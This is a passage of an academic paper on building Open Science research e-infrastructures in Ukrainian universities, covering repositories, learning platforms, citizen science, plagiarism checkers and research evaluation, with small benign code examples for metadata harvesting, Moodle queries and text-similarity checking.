We consider the research e-infrastructure ecosystem as a subsystem of the open science ecosystem: a set of e-tools that provide resources and services to researchers, staff, students and other members of the open science research community to conduct research and promote innovation. Developed taking into account the European standards and the available research e-infrastructure of Ukraine, the proposed model of the research e-infrastructures ecosystem of Ukrainian universities is aimed at ensuring the effective functioning of each of its components (open research data; open access to publications; citizen science; education and skills; research responsibility and integrity; research performance evaluation) and of the whole open science ecosystem (Fig. 2).

Fig. 2. The model of research e-infrastructures ecosystem of Ukrainian universities. Source: designed by the authors.

This model reflects the main directions of the policy on the formation and development of the Ukrainian universities' research e-infrastructures ecosystem, which create opportunities for researchers, staff, students and other research community members to engage in Open Science at all stages of research and promote the integration of university research ecosystems into the national research area, the ERA and the EHEA.

3.3 Open Science Policy

The implementation of Open Science in universities involves the development of appropriate institutional policies in general and of policies for the use of research e-infrastructures in particular. We consider that the policy on Open Science should include:

• including in the university development strategies the goals for implementing Open Science principles in general and for creating and supporting the development of research infrastructures in particular;
• defining the role and responsibilities of administrative staff, researchers, faculty and students in implementing the policy;
• creating a system of motivation (recognition and rewards) for researchers, faculty and students for involvement in the policy's implementation;
• defining mechanisms for investing in e-infrastructure;
• developing mechanisms for monitoring and reviewing the policy;
• training and consulting researchers, faculty and students on using e-infrastructures at all stages of the research data life cycle.

To acquaint the leadership and academic staff of universities with the opportunities and benefits of Open Science, the authors of this paper, at the Institute of Higher Education of the National Academy of Educational Sciences of Ukraine and under the EU project "Reinventing Displaced Universities: Enhancing Competitiveness, Serving Communities" (REDU) (2020–2024), conducted trainings on research activities in the implementation of the Open Science concept and on scientometrics in the evaluation of research results. Below we analyse the possibilities of using e-infrastructures according to the main components of Open Science.
3.4 Open Research Data

The open research data concept is connected with the new paradigm of Open Science and anticipates that scientific results should be open access, i.e. presented in the most usable (digital, online) and accessible (free of charge, free of most copyright and licensing restrictions) forms. Besides, it is expected that "the data acquired by individual scientists and scientist groups should be subject to a default position whereby it is made findable, accessible, interoperable and reusable (FAIR)". Although there are concerns that open research data infrastructures and systems may fall under the control of Internet and cloud service providers whose interests may not coincide with those of the wider research community, open research data itself gives obvious benefits and has the potential to deliver greater efficiencies in research, improve its rigour and reproducibility, enhance its impact, and increase public trust in its results [43]. Existing research in this area, while noting the obvious benefits of using open research infrastructures, emphasises certain limitations: "reusing qualitative data conflicts with some of the epistemological and methodological principles of qualitative research; there are ethical concerns about making data obtained from human participants open, which are not completely addressed by consent and anonymisation; many research projects are small scale and the costs of preparing and curetting data for open access can outweigh its value" [44]. Even though infrastructures for depositing and using scientific data (such as Figshare, Zenodo, Open Science Framework, Mendeley Data) are widely used in the EU countries, it remains difficult for many researchers to find appropriate services to handle the data they create and to locate data they might wish to use.

3.5 Open Access to Publication

Open access to publications plays an essential part in the Open Science policy, making research results more accessible. Ukrainian universities have the opportunity to use the National Repository of Academic Texts, the Digital Library of the National Academy of Educational Sciences of Ukraine, institutional repositories, and other online services such as the Directory of Open Access Journals, the Directory of Open Access Books, Figshare, Zenodo, etc. The National Repository of Academic Texts (nrat.ukrintei.ua) is a nationwide distributed electronic database in which academic texts are accumulated, stored and systematised. The purpose of the National Repository is to make the scientific and international information of Ukraine and the world as accessible as possible, which will promote the development of educational, research, and innovative activities by improving access to academic texts and promoting academic integrity. Academic texts stored in the National Repository are subject to copyright and protected by law. It consists of a central repository maintained by the administrator and local repositories maintained by institutional participants. At the beginning of 2022, the National Repository presented the metadata of 162.8 thousand research reports (107.9 thousand full texts) and 162.8 thousand theses (108.4 thousand full texts) [45]. The Digital Library of the National Academy of Educational Sciences of Ukraine (lib.iitta.gov.ua) at the end of 2021 included more than 26.1 thousand full-text resources, which had been downloaded more than 8.8 million times, of which almost 1.7 million in 2021 compared to 1 million in 2018. According to monitoring data, in 2021 the website had more than 47.6 thousand users and 594.0 thousand page views from 182 countries (most users from Ukraine – 75%) [46, p. 20].
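Repositories of this kind commonly expose their metadata through the standard OAI-PMH protocol, which makes programmatic harvesting straightforward. The sketch below is illustrative only: whether a given repository enables the endpoint, and its exact base URL, are assumptions to verify case by case. It fetches Dublin Core records via a ListRecords request using only the Python standard library.

    import urllib.request
    import xml.etree.ElementTree as ET

    DC_TITLE = "{http://purl.org/dc/elements/1.1/}title"

    def harvest_titles(base_url: str, limit: int = 10):
        """Return up to `limit` record titles from an OAI-PMH endpoint (oai_dc)."""
        url = f"{base_url}?verb=ListRecords&metadataPrefix=oai_dc"
        with urllib.request.urlopen(url, timeout=30) as response:
            tree = ET.parse(response)
        return [element.text for element in tree.iter(DC_TITLE)][:limit]

    # Hypothetical usage; the base URL must be the repository's actual OAI endpoint:
    # print(harvest_titles("https://lib.iitta.gov.ua/cgi/oai2"))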
3.6 Education and Skills

The integration of ICT solutions into the process of skills development corresponds with the need to make the training process more flexible and relevant to a person's needs. The complex of e-solutions (especially for joint educational/research activities of teams) can include not only planning software (Slack, Yammer, HipChat), cloud technologies (Google Drive) and platforms for correspondence, calendaring and documents (Google, Apple, Microsoft), but also software for learning (Moodle, Prometheus) and real-time communication (Google Meet, Microsoft Teams, Zoom). Moodle is the most popular platform with a modern LMS, which counts 316 million users worldwide, 1.8 billion course enrolments, 41 million courses in 42 languages, and 179,000 Moodle sites [47], and it offers open access to education technology. The platform has been created as open source with a publicly accessible design, which enables users to modify and share it. Such open-source learning represents a learner-directed model of skills development with the possibility of creating a specific learning environment (for teachers) and participating in shared learning experiences online (for learners). According to research, this platform has advantages: functionality (with such sub-characteristics as suitability, accurateness, interoperability, security), reliability (including maturity, fault tolerance, recoverability), usability (understandability, learnability, operability, attractiveness), efficiency (including time behaviour and resource utilisation), maintainability (analysability, changeability, stability) and portability (testability, adaptability, installability, conformance, replaceability) [48]. It also has some limitations: the system is not fully developed to cope with big projects, the website can shut down on occasion, blocking students' access to course materials, and Moodle users frequently complain about the troubles they experience with customisations, etc. [49]. Prometheus is the largest open online education platform in Ukraine, with 1,800,000 users, more than 250 courses, and about 1,000,000 certificates issued. Prometheus is also the only Ukrainian platform with Android and iOS mobile applications [50]. The platform offers paid distance courses from well-known teachers and free courses that help to develop skills in various areas. Unlike Moodle, Prometheus is not open source, and the project team handles the technical issues of course placement and administration. Customisation is done by creating a unique graphic design of the course and its content, which, however, is also implemented by the team.
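To illustrate the kind of programmatic integration such LMS platforms allow, the sketch below queries Moodle's web-services REST endpoint for the course list. It is a hedged example: it assumes a Moodle site with web services enabled and a token authorised for the standard core_course_get_courses function, so both the site URL and the token here are placeholders.

    import json
    import urllib.parse
    import urllib.request

    def moodle_courses(site_url: str, token: str):
        """Fetch the course list from a Moodle site via its REST web service."""
        query = urllib.parse.urlencode({
            "wstoken": token,                         # web-service token (placeholder)
            "wsfunction": "core_course_get_courses",  # standard Moodle WS function
            "moodlewsrestformat": "json",
        })
        url = f"{site_url}/webservice/rest/server.php?{query}"
        with urllib.request.urlopen(url, timeout=30) as response:
            return json.load(response)

    # Hypothetical usage:
    # for course in moodle_courses("https://moodle.example.edu", "YOUR_TOKEN"):
    #     print(course["id"], course["fullname"])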
Platforms traditionally used as real-time communication tools (Google Meet, Microsoft Teams, Zoom) are also widely used for skills development by "bringing students at multiple home locations, classroom sites or field sites together via video/audio conferencing", "inviting guest lecturers to your courses for interviews, presentations and conversations, recording these sessions for further use as instructional content", and "providing visual meeting space for students outside of regular class time and for online courses" [51]. They also have a number of "unique features that enhance its potential
appeal to qualitative and mixed-methods researchers" [52]. For instance, their functionality makes it possible to collect qualitative interview data. Several studies have concluded that respondents generally "rated Zoom above alternative interviewing mediums such as face-to-face, telephone, and other videoconferencing services, platforms, and products" ... "because of its relative ease of use, cost-effectiveness, data management features, and security options" [52]. Using tools such as breakout rooms (available in the Zoom environment), the user can also implement research methods such as group activities, expert evaluation, Delphi analysis, foresight, assessment centres, etc. Q&A sessions are also helpful for greater engagement; they can be public or private, and attendees can view, comment on, and upvote questions. It is also possible to "create a few pre-planned high-quality questions in case attendee questions are not submitted quickly" [53].

3.7 Citizen Science

Citizen Science is a collaboration between researchers and those interested in collecting data, documenting changes, monitoring social and natural phenomena or carrying out activities that help advance different kinds of research, promoting creativity, scientific literacy, and innovation [54]. The rapid development of Citizen Science over the last decade is due, on the one hand, to diversified changes in various phenomena of society and nature (which cannot be studied carefully due to a lack of resources, including empirical data) and, on the other, to the desire of citizens to become engaged in the process of knowledge co-creation, "actively setting the agenda, crowdsourcing via web platforms, and collecting and analysing a broad spectrum of scientific data" [55]. The latest research shows that the development of a strong connection between researchers and citizens can be quite beneficial for both sides, making "distinct, novel and innovative contributions to scientific knowledge" by "advancing distinct research techniques, such as computational modelling, to draw useful insights from opportunistic datasets and technologies" and creating "cross-disciplinary networking" [55]. From our point of view, for the development of citizen science it is crucial to create and use appropriate IT infrastructure, considering the compliance of IT tools with the applicable process and data standards, their ability to connect with the information supply chain, etc. It is also vital that "the information and data generated by citizen science projects are likely to be the most enduring and impactful legacy if they are made publicly accessible on time and in a form suitable for multiple downstream uses" [55]. One such tool is the "Science to Business" platform, which has been developed to "bring together three worlds which should work together but too often stumble apart: industry, research and policy" (universities, companies, and research and policy organisations) [56]. Its functionality helps to implement a wide range of targeted and tailored communication activities, including strategic advice, editorial, policy research, high-level networking, intelligence, event organisation and online promotion. Another platform is EU-Citizen Science for sharing knowledge, tools, training and resources, which serves as a knowledge hub and the European reference point for citizen science in aid of its mainstreaming [57].
It contains 230 projects engaging the public in research via citizen science activities, 190 useful resources for planning and running citizen science projects, 61 training resources about the practice of citizen science, 205 organisations involved in citizen science projects and research, and 2,237 users.
In 2022, the Ministry of Education and Science of Ukraine launched "Science 2 Business" (s2b.nauka.gov.ua), an online platform for communication and effective interaction between business and the scientific community. The platform enables businesses to find the scientific results necessary for their development, and researchers to realise their scientific potential and commercialise their research results. The initiative aims to develop an innovative economy in Ukraine and to create an attractive, competitive, and high-quality business environment for investors, focused on the practical use of Ukrainian researchers' R&D results [58].
3.8 Research Responsibility and Integrity
Open and transparent practices accelerate the research process with unprecedented speed and strengthen core academic values such as research integrity, collaboration and knowledge sharing. With greater openness comes greater responsibility for all Open Science actors, which, together with public accountability, sensitivity to conflicts of interest, vigilance about the possible social and environmental consequences of research, intellectual honesty and respect for ethical principles, should be the basis for good governance of Open Science [16, p. 18]. Open Science is also key to increasing public responsibility and trust in science [23]. The development of Internet technologies creates favourable conditions for the dissemination of information and also for its illegal copying: increasing the openness of the information space and providing free access to the vast majority of publications creates opportunities for copyright infringement. Preliminary (primary) detection of plagiarism in scientific, educational and scientific-methodical works, theses and qualification works is recommended to be carried out through expert evaluation (review, feedback from supervisors) and using computer programmes. The basic characteristics of standard programmes for examining textual borrowing are: the ability to search on the Internet; search in local databases; the capacity to work with different text formats; simplicity of the interface; a batch verification service; protection against bypassing via letter substitution; rewrite analysis support (synonym recognition); a report generation function; and additional means of text analysis. Analysis of modern systems for examining academic texts worldwide has identified the most used ones, namely: WCopyFind (USA), Turnitin (USA), Viper (Great Britain), Urkund (Sweden), PlagScan (Germany), StrikePlagiarism (Poland), Unicheck (Ukraine), iThenticate (USA), and CrossRef Plagiarism Check (USA). Free software products (AntiPlagiarism.NET, Advego Plagiatus, Double Content Finder (DCFinder), Plagiarism Detector, etc.) and commercial software (Turnitin, Unplag, Plagiat.pl, Unicheck) are available in Ukraine. In the Ukrainian education system, online services that check text documents for borrowed parts of the text are used to implement the requirements of the Law of Ukraine "On Education" (Article 42) [59]. One such service is Unicheck (formerly Unplag.com), a paid online service that checks text documents for borrowed parts. Created in 2014 by Ukrainian developers, namely the IT company Phase One Karma [60], the service can be used online or integrated into learning management systems (LMS) holding internal databases of user documents. Such LMS include Moodle, Canvas, Blackboard, Schoology, Google Classroom and others.
The analysis of the service's delivery has shown its positive characteristics: the Unicheck navigation system requires minimal technical support and special equipment (a computer, a browser and Internet access); it works with formats such as *.doc, *.docx, *.pdf, *.odt, *.rtf and *.html and with an unlimited number of users at a time. The programme allows users to create an individual profile and to check texts both against the local database and on the Internet. The user receives a uniqueness report indicating the plagiarism percentage and its sources, with the borrowed text highlighted in a different colour. The service also allows users to edit text online and recheck it. The service is used by more than 1,100 universities in more than 100 countries; currently, more than 50 Ukrainian universities use it. Continuous improvement and innovation of its products and compliance with the criteria of quality, wide availability and responsibility led to Unicheck's acquisition in 2020 by the American company Turnitin [61]. Several programmes that provide a plagiarism-checking service have been developed by Plagiat.pl (namely StrikePlagiarism.com, AKAMBIKO, ASAP, BookWatch, etc.). By the criterion of prevalence, a successful product is StrikePlagiarism.com [62]. StrikePlagiarism.com is a service created in 2002 to test academic writing for plagiarism; it is used by more than 500 universities in Poland, Germany, Spain, Portugal, Romania and elsewhere. In 2018, after the signing of a Memorandum with the Ministry of Education and Science of Ukraine, the service became available to the Ukrainian university community [63]. Among the sources that StrikePlagiarism.com indexes and integrates is an aggregator of popular scientific journals (Cambridge, Oxford, Springer, etc.). The system works on a SaaS basis and meets the criteria of quality, versatility, and confidentiality. The advantages of the service include round-the-clock support, as its offices are located in different time zones, and the adaptation of the programme to 15 languages (English, German, French, Spanish, Turkish, Polish, Romanian and others). The service is paid and available to both universities and individual users. CrossRef has been "designed to develop and maintain a global hightech infrastructure for scientific communications" [64] and provides its members with access to Similarity Check, a text uniqueness checker based on Turnitin's iThenticate plagiarism detection tool. iThenticate is one of the world's most widely used paid tools for verifying the uniqueness of texts. According to its developers, every third academic journal (more than 1,300 publishers) [65] is now connected to iThenticate. The tool is actively used by the editors of Nature, Elsevier, Springer, Wiley and others. Thus, with greater openness comes greater responsibility for all open science actors. To ensure the responsibility and integrity of researchers, the implementation of open science practices should be based on honesty at all stages of research (development, implementation, reporting); transparency (providing complete and unbiased information on research results through open communication); respect for all participants in the research process (colleagues, other research participants, society); and conducting research in line with applicable norms and standards (ethical, legal and professional).
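To make the mechanism concrete, the sketch below shows the simplest form of textual-borrowing detection: word n-gram (shingle) overlap, with a small normalisation step of the kind used to resist letter-substitution bypassing. It is a minimal illustration of the general idea only, not the algorithm of Unicheck, StrikePlagiarism.com or iThenticate; the homoglyph map and all names are our own assumptions.

```python
# A minimal sketch of n-gram overlap checking, assuming a toy homoglyph map;
# real services layer local-database search, batch verification and
# synonym-aware rewrite analysis on top of such a core.
HOMOGLYPHS = str.maketrans({"а": "a", "е": "e", "о": "o", "с": "c"})  # Cyrillic -> Latin

def shingles(text: str, n: int = 3) -> set:
    """Lower-case, normalize look-alike letters, and return word n-grams."""
    words = text.lower().translate(HOMOGLYPHS).split()
    return {tuple(words[i:i + n]) for i in range(len(words) - n + 1)}

def similarity(a: str, b: str, n: int = 3) -> float:
    """Jaccard similarity of the two texts' n-gram sets (0.0-1.0)."""
    sa, sb = shingles(a, n), shingles(b, n)
    return len(sa & sb) / len(sa | sb) if sa | sb else 0.0

doc = "Open science practices strengthen research integrity and knowledge sharing."
src = "Open science practices strengthen research integrity, collaboration and knowledge sharing."
print(f"similarity: {similarity(doc, src):.2f}")
```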
3.9 Research Performance Evaluation
The development of responsible research and researcher evaluation practices under Open Science should incentivize quality science, recognizing the diversity of research outputs, activities and missions [16, p. 22]. In recent years, several initiatives have been launched in Ukraine concerning research performance evaluation, e.g., the functioning of the Open Ukrainian Citation Index, the development of the Ukrainian Research Information System, and the creation of the national ORCID consortium. The Ukrainian Research Information System (URIS) was created to monitor scientific and technical activities and to increase the efficiency of management decisions on the use of material and financial resources. The system integrates data on institutions, researchers, projects, publications and research infrastructures; automates MoES of Ukraine procedures (including certification, accreditation and record keeping); and contains useful information for researchers, authors of scientific publications and editors of scientific journals. With the introduction of the system, researchers will have a single point of access to research information, funding organizations will be able to track the results of funded research more easily, businesses will find it easier to identify promising technologies, and the public and journalists will receive information on key areas of national science and technology [66]. The Open Ukrainian Citation Index (ouci.dntb.gov.ua) is a search engine and database of scientific citations drawn from all publications that use the Cited-by service from Crossref and support the Initiative for Open Citations. OUCI aims to simplify the search for scientific publications, to draw editors' attention to the problem of the completeness and quality of the metadata of Ukrainian scientific publications, and to improve the presentation of Ukrainian scientific publications in specialized search engines (e.g., Dimensions, Lens.org, 1findr, Scilit), which can expand their readership. It will allow bibliometricians to freely study the relationships between authors and documents from various scientific disciplines, particularly in the Social Sciences and Humanities [67]. In the transition to Open Science, there is a particular problem of clarifying, specifying and evaluating research in the Social Sciences and Humanities, which requires consideration of their richness, diversity, interdisciplinarity, national context and stakeholders [68, p. 258].
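Since OUCI builds on publications that expose Crossref's open Cited-by data, basic citation metadata can be retrieved directly from the public Crossref REST API. The following minimal sketch is illustrative only; the DOI is taken from reference [68] purely as an example.

```python
import json
import urllib.request

def crossref_metadata(doi: str) -> dict:
    """Fetch work metadata, including the open citation count, from Crossref."""
    url = f"https://api.crossref.org/works/{doi}"
    with urllib.request.urlopen(url, timeout=30) as response:
        return json.load(response)["message"]

# Illustrative DOI only: reference [68] of this paper.
meta = crossref_metadata("10.33407/itlt.v80i6.4155")
print(meta.get("title"), meta.get("is-referenced-by-count"))
```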
4 Recommendations
The generalised results of this study provide grounds for recommendations to the Open Science subjects on the implementation of priority measures for the formation and development of Ukrainian universities' research e-infrastructures at the national and university levels, in particular:
4.1 National Level
1. To identify indicators for evaluating the state of research infrastructure and participation in international and national research projects of higher education institutions.
2. To develop national procedures and indicators for quality assurance of research activities based on the Open Science principles and approaches.
3. To develop a digital platform "Ukrainian Open Science" for the national system of quality assurance of research activities based on the Open Science principles and approaches.
4. To design the national citation database UkrScience.
5. To improve the system of state funding of higher education and research institutions according to the quality of their research activity results by introducing criteria and indicators for ensuring the quality of research activities based on the Open Science principles and approaches.
6. To provide support and encouragement for developing national research infrastructures that ensure Open Access, and to integrate them into European and global research e-infrastructure ecosystems.
7. To promote the development of citizen science, engaging a wide range of stakeholders (universities, companies, research and policy organisations) in the process of knowledge co-creation: actively setting the agenda, crowdsourcing via web platforms, and collecting and analysing a broad spectrum of research data.
4.2 University Level
1. To develop a roadmap for the development of institutional infrastructures, providing for the possibility of their integration into relevant national, European and global research infrastructures.
2. To provide university researchers with access to university and external research infrastructures (e.g., private sector research institutions), including remote access.
3. To support and strengthen collaboration between academia and the non-academic sector to bolster the role of universities as central actors in innovation ecosystems.
4. To provide researchers with training on using Open Science opportunities and tools to implement the idea of research openness.
5. To use in educational and research activities a set of ICT solutions, including planning software, cloud technologies, platforms for correspondence, calendars, joint documents, and software for learning and communication in real time.
6. To use in the research process real-time communication tools (Google Meet, Microsoft Teams, Zoom) to collect qualitative interview data and to conduct group events, expert evaluation, Delphi analysis, foresight, and assessment centres.
5 Conclusions
1. The lack of a single approach among researchers and practitioners to defining the concept of "open science" and the structure of its main components was found based on an analysis of conceptual approaches in scientific publications and in documents of UNESCO, the EU, and the European University Association. A complex of the main structural components of the modern open science ecosystem is proposed and substantiated by generalising the existing approaches; it consists of: open research data; open access to publications; citizen science; education and skills; research responsibility and integrity; and research performance evaluation. The open science ecosystem is considered a new paradigm of policy and of the organisation of research activity for all actors under digital transformation and society's growing demands for
openness, inclusiveness, responsibility, and the innovative character of science. A key component and necessary condition for creating and developing the open science ecosystem is a sufficiently functioning ecosystem of research e-infrastructures within its structure.
2. It has been found that implementing Open Science practices in universities requires the creation and support of institutional Open Science research infrastructures, increasing their accessibility, and harmonising the functioning of institutional infrastructures with research infrastructures at the national, European and global levels. A complex of ICT solutions significantly boosts educational and research activities and includes planning software, cloud technologies, platforms for correspondence, calendaring, shared documents, and software for learning and real-time communication.
3. The model of the research e-infrastructures ecosystem of Ukrainian universities is proposed and theoretically substantiated. It is grounded in a network approach, includes a set of managed network environments (organisational practices, technical infrastructures, social structures), and is designed to ensure the uninterrupted activity of the universities' key open science structural components at the institutional, national, European and world levels. The advantages of the proposed model are: (1) a clear structuring of the key components of Open Science; (2) openness and flexibility regarding its functional filling with appropriate e-infrastructural resources and tools (taking into account the university's research specifics, the existing external and internal research e-infrastructure, etc.).
4. Based on an analysis of EU documents on developing the EHEA and ERA, recommendations are offered on priority measures for the formation and development of the research e-infrastructures of Ukrainian universities at the national and university levels. The proposed model reflects the main spheres and policy directions for creating and developing the universities' open science research e-infrastructures ecosystem; it has been developed taking into account the existing national research e-infrastructure and the open science ecosystem and research e-infrastructures of the EU. Its implementation is intended to create opportunities for researchers, faculty, students and all other members of research communities to be involved in open science at all stages of research; it will promote the development of university research activities, ensure the effective functioning of the entire open science ecosystem in Ukraine and the formation of a strong national research area, and create conditions for successful integration into the ERA and EHEA.
References
1. European University Association: The EUA Open Science Agenda 2025 (2022). https://bit.ly/3ObZAUb
2. Lugovyi, V., et al.: Theoretical bases of increasing the research capacity of Ukrainian universities in the context of implementing the concept of "open science": analytical materials. In: Lugovyi, V., Petroye, O. (eds.). Institute of Higher Education of NAES of Ukraine, Kyiv (2021). https://doi.org/10.31874/978-617-7644-53-7-2021
3. Cabinet of Ministers of Ukraine: Audit of the Economy of Ukraine 2030 (2020). https://nes2030.org.ua/docs/doc-audit.pdf
4. Ministry of Education and Science of Ukraine: Survey on Institutional Repositories, Open Science and Willingness to Cooperate with the National Repository of Academic Texts (2020). https://bit.ly/3n88XID
5. United Nations Conference on Trade and Development: Technology and Innovation Report 2021. Catching Technological Waves. Innovation with Equity. United Nations (2021). https://bit.ly/3NcCdIH
6. President of Ukraine: Issues of the National Council for the Recovery of Ukraine from the Consequences of the War (266/2022) (2022). https://zakon.rada.gov.ua/laws/show/266/2022
7. Friesike, S., Widenmayer, B., Gassmann, O., Schildhauer, T.: Opening science: towards an agenda of open science in academia and industry. J. Technol. Transf. 40(4), 581–601 (2014). https://doi.org/10.1007/s10961-014-9375-6
8. Vicente-Saez, R., Martinez-Fuentes, C.: Open science now: a systematic literature review for an integrated definition. J. Bus. Res. 88, 428–436 (2018). https://doi.org/10.1016/j.jbusres.2017.12.043
9. Fecher, B., Sokolovska, N., Völker, T., Nebe, P., Kahn, R.: Making a research infrastructure: conditions and strategies to transform a service into an infrastructure. Sci. Public Policy 48(4), 499–507 (2021). https://doi.org/10.1093/scipol/scab026
10. McKiernan, E.C., et al.: Point of view: how open science helps researchers succeed. Elife 5, e16800 (2016). https://doi.org/10.7554/elife.16800
11. Laine, H.: Open science and codes of conduct on research integrity. Informaatiotutkimus 37(4) (2018). https://doi.org/10.23978/inf.77414
12. Valzano, V.: Open Science: new models of scientific communication and research evaluation. SCIRES-IT 10, 1–12 (2020). https://doi.org/10.2423/i22394303v10Sp5
13. Maddi, A.: Measuring open access publications: a novel normalized open access indicator. Scientometrics 124(1), 379–398 (2020). https://doi.org/10.1007/s11192-020-03470-0
14. Forsberg, E.-M., Gerber, A., Carson, S.G.: Including responsible research and innovation (RRI) in the development and implementation of Horizon Europe. RRI Tools blog (2020). https://bit.ly/3bjrCP9
15. Tijdink, J., Horbach, S., Nuijten, M., O'Neill, G.: Towards a research agenda for promoting responsible research practices. J. Empir. Res. Hum. Res. Ethics 16(4), 450–460 (2021). https://doi.org/10.1177/15562646211018916
16. UNESCO: UNESCO Recommendation on Open Science (2021). https://unesdoc.unesco.org/ark:/48223/pf0000379949
17. Shaping Europe's Digital Future: EOSC beyond 2020 – Next Steps. European Commission (2020). https://bit.ly/3bdmj3z
18. European Commission, Directorate-General for Research and Innovation, Baker, L., Cristea, I., Errington, T., et al.: Reproducibility of Scientific Results in the EU. Scoping report. In: Lusoli, W. (ed.). Publications Office of the European Union (2020). https://doi.org/10.2777/341654
19. European Commission: European Research Infrastructure Consortium (ERIC). What ERIC Is, Related Documents, Requirements and Guidelines (n.d.). https://bit.ly/3OvMGQK
20. European Commission: European Research Infrastructures. What Research Infrastructures are, What the Commission is Doing, Strategy Areas, Funding and News (n.d.). https://bit.ly/3HGmvof
21. Hans: Global Research Data Infrastructures: The GRDI2020 Vision. GRDI (2020). https://bit.ly/3OnAod4
22. Ayris, P., López de San Román, A., Maes, K., Labastida, I.: Open Science and its role in universities: a roadmap for cultural change. Advice paper no. 24. League of European Research Universities (2018). https://bit.ly/2LHg05O
23. European University Association: Open Science (n.d.). https://eua.eu/issues/21:open-science.html
24. European Commission: Open Science (2019). https://bit.ly/3QCfatU
25. Chmyr, O.S.: Development of research e-infrastructure in Ukraine: creation of the national repository of academic texts. Stat. Ukraine 87(4), 86–97 (2019). https://doi.org/10.31767/su.4(87)2019.04.09
26. Orliuk, O.: European Union's Open Science Policy as a global benchmark for Ukraine: legal environment. Theor. Pract. Intellect. Property 6, 158–172 (2021). https://doi.org/10.33731/62021.249468
27. European Higher Education Area: Rome Ministerial Communiqué (2020). https://bit.ly/3tUFnKl
28. European Commission: Ukraine's Association Agreement to Horizon Europe and Euratom Research and Training Programmes Enters into Force (2022). https://bit.ly/3OevMq0
29. European Commission: Work Programme 2009. Capacities. Part 1. Research Infrastructures (C(2008)4566) (2008). https://bit.ly/3xOwpiO
30. European Commission, Directorate-General for Research and Innovation: Supporting the Transformative Impact of Research Infrastructures on European Research. Report of the High-Level Expert Group to assess the progress of ESFRI and other world class research infrastructures towards implementation and long-term sustainability. Publications Office of the European Union (2020). https://doi.org/10.2777/3423
31. European Commission, Directorate-General for Research and Innovation, Whittle, M., Rampton, J.: Towards a 2030 Vision on the Future of Universities in the Field of R&I in Europe. Publications Office of the European Union (2020). https://doi.org/10.2777/510530
32. European University Association: Universities without walls. A vision for 2030 (2021). https://bit.ly/3tS9NwG
33. Kirkegaard, J.F.: Toward defining and deploying the European Interest(s). German Marshall Fund (2021). https://bit.ly/3ycnadG
34. Candela, L., Grossi, V., Manghi, P., Trasarti, R.: A workflow language for research e-infrastructures. Int. J. Data Sci. Analytics 11(4), 361–376 (2021). https://doi.org/10.1007/s41060-020-00237-x
35. European Open Science Cloud: Strategic Research and Innovation Agenda (SRIA) of the European Open Science Cloud (EOSC). Version 1.0 (2021). https://bit.ly/3N5BusU
36. European Commission, Directorate-General for Communications Networks, Content and Technology: Shaping the Digital Transformation in Europe. Final Report. Publications Office of the European Union (2020). https://doi.org/10.2759/294260
37. Shaping Europe's Digital Future: The Digital Europe Programme (2022). https://digital-strategy.ec.europa.eu/en/activities/digital-programme
38. Novikova, O.F., et al.: Formation of conceptual bases of digital transformation of education and science of Ukraine. Visnyk Ekonomichnoi Nauky Ukrainy 1(40), 190–198 (2021). https://doi.org/10.37405/1729-7206.2021.1(40).190-198
39. Cabinet of Ministers of Ukraine: On Approval of the National Economic Strategy for the Period up to 2030 (179) (2021). https://bit.ly/43tGikQ
40. Ministry of Education and Science of Ukraine: On Approval of the Roadmap for the Integration of Ukraine's Research and Innovation System into the European Research Area (167) (2021). https://bit.ly/3HQ8EvG
41. Cabinet of Ministers of Ukraine: On Approval of the Concept of the State Target Program for Developing Research Infrastructures in Ukraine for the Period up to 2026 (322-r) (2021). https://zakon.rada.gov.ua/laws/show/322-2021-p
42. Cabinet of Ministers of Ukraine: Preparation of Proposals for a Comprehensive Recovery Plan of Ukraine begun (2022). https://bit.ly/3O8ZfS6
43. Department for Business, Energy & Industrial Strategy: Realising the Potential – Final Report of the Open Research Data Task Force. GOV.UK (2018). https://bit.ly/2mZAPmz
44. Childs, S., McLeod, J., Lomas, E., Cook, G.: Opening research data: issues and opportunities. Rec. Manag. J. 24(2), 142–162 (2014). https://doi.org/10.1108/RMJ-01-2014-0005
45. Cabinet of Ministers of Ukraine: Regulations on the National Repository of Academic Texts (541) (2017). https://bit.ly/3MUr5lS
46. Kremen, V.H.: Report on the Activities of the National Academy of Educational Sciences of Ukraine in 2021. NAES of Ukraine, Kyiv (2022). https://doi.org/10.37472/zvit2021
47. Moodle: About us. Making Quality Online Education Accessible for All (2022). https://moodle.com/about/
48. Sarkar, P., Rahman, Z.: Electronic resources in the virtual learning environment and evaluation of Moodle based learning management system applied at PES Institute of Technology. E-Library Sci. Res. J. 3(10) (2015). https://bit.ly/3zW7NHU
49. Al-Ajlan, A.S.: A comparative study between E-learning features. In: Pontes, E., Silva, A., Guelfi, A., Kofuji, S.T. (eds.) Methodologies, Tools and New Developments for E-Learning, pp. 191–214. IntechOpen (2012). https://doi.org/10.5772/29854
50. Prometheus: Prometheus – the Largest Online Education Platform in Ukraine (2022). https://prometheus.org.ua/about-us/
51. Engaging your Learner with Video in the Classroom. Zoom Best Practices and Tips. Center for Innovation in Teaching and Research (2019). https://bit.ly/3HFV3ad
52. Archibald, M., Ambagtsheer, R., Casey, M., Lawless, M.: Using Zoom videoconferencing for qualitative data collection: perceptions and experiences of researchers and participants. Int. J. Qual. Meth. 18, 160940691987459 (2019). https://doi.org/10.1177/1609406919874596
53. Zoom Video Communications: Running Engaging Online Events (2020). https://bit.ly/39HSszX
54. Haklay, M., Dörler, D., Heigl, F., Manzoni, M., Hecker, S., Vohland, K.: What is citizen science? The challenges of definition. In: Vohland, K., et al. (eds.) The Science of Citizen Science, pp. 13–33. Springer, Cham (2021). https://doi.org/10.1007/978-3-030-58278-4_2
55. Hecker, S., Haklay, M., Bowser, A., Makuch, Z., Vogel, J., Bonn, A. (eds.): Citizen Science: Innovation in Open Science, Society and Policy. UCL Press (2018). http://www.jstor.org/stable/j.ctv550cf2
56. Science | Business: About Us (2022). https://sciencebusiness.net/about-us
57. EU-Citizen.Science: About EU-Citizen.Science (n.d.). https://eu-citizen.science/about/
58. Ministry of Education and Science of Ukraine: Science for Business in Ukraine: Launch of a Platform for Communication and Effective Interaction (2022). https://bit.ly/39GoyvO
59. Law of Ukraine "On Education" (2017). https://zakon.rada.gov.ua/laws/show/2145-19
60. Phase One Karma (n.d.). https://p1k.org/
61. Unicheck: Unicheck and Turnitin are Now One Team (2020). https://unicheck.com/ua/blog/unicheck-ta-turnitin-vidteper-odna-komanda
62. StrikePlagiarism.com: About us (n.d.). https://strikeplagiarism.com/en/about_us.html
